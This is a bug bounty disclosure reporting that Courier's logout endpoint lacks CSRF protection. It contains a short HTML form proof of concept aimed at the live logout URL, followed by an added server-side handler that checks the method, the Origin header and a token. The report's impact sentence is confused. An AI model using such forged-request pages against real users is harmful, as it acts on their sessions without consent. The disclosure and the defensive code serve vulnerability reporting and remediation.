hackerone / Hackerboy404 / H1:905831
Jun 23, 2020 - 5:17 a.m.

Courier: Logout page does not prevent CSRF

Summary:

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. … If the victim is an administrative account, CSRF can compromise the entire web application.

Steps To Reproduce:

1. Create a CSRF logout PoC using the following code.
Code that I use:
<html>

<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.trycourier.app/logout">
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Supporting Material/References:

I have provided an attack scenario for it; please check it.

Impact

Log out any victim into the attacker account, send the HTML made by the attacker, and then log him out of the session.

The hacker selected the Cross-Site Request Forgery (CSRF) weakness. This vulnerability type requires contextual information from the hacker.
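
The server-side check whose absence the report describes, as an added example that is not part of the report and not Courier's code: a logout handler that refuses GET, checks the Origin header, and verifies a per-session CSRF token. All names here (handleLogout, safeEqual, csrf_token, TRUSTED_ORIGIN, the request and session shapes) are hypothetical, and the sample requests are constructed.

```javascript
// Added example with hypothetical names; framework-free so it runs under plain Node.
const TRUSTED_ORIGIN = 'https://app.example'; // placeholder for the site's own origin

// Constant-time comparison so the token check does not reveal how many
// leading characters of a guessed token were correct.
function safeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { method, headers, body }; session: { id, csrfToken } or null.
function handleLogout(req, session) {
  // A form without a method attribute submits as GET and the browser attaches
  // the victim's cookies, so a state-changing route must not accept GET.
  if (req.method !== 'POST') return { status: 405, loggedOut: false };
  if (!session) return { status: 401, loggedOut: false };

  // Browsers send Origin on cross-site POSTs; reject any foreign value.
  // A missing header falls through to the token check below.
  const origin = req.headers['origin'];
  if (origin !== undefined && origin !== TRUSTED_ORIGIN) {
    return { status: 403, loggedOut: false };
  }

  // Synchronizer token: another site cannot read the value bound to the session.
  const supplied = req.body ? req.body.csrf_token : undefined;
  if (!safeEqual(supplied, session.csrfToken)) return { status: 403, loggedOut: false };

  return { status: 204, loggedOut: true };
}

// Constructed sample session and requests.
function demo() {
  const session = { id: 's1', csrfToken: 'constructed-token-0123456789abcdef' };
  const good = { csrf_token: session.csrfToken };
  return [
    handleLogout({ method: 'GET', headers: {}, body: {} }, session),                              // cross-site GET form
    handleLogout({ method: 'POST', headers: { origin: 'https://other.example' }, body: good }, session),
    handleLogout({ method: 'POST', headers: { origin: TRUSTED_ORIGIN }, body: {} }, session),     // no token
    handleLogout({ method: 'POST', headers: { origin: TRUSTED_ORIGIN }, body: good }, session),   // legitimate
  ].map((r) => r.status);
}

console.log(demo());
```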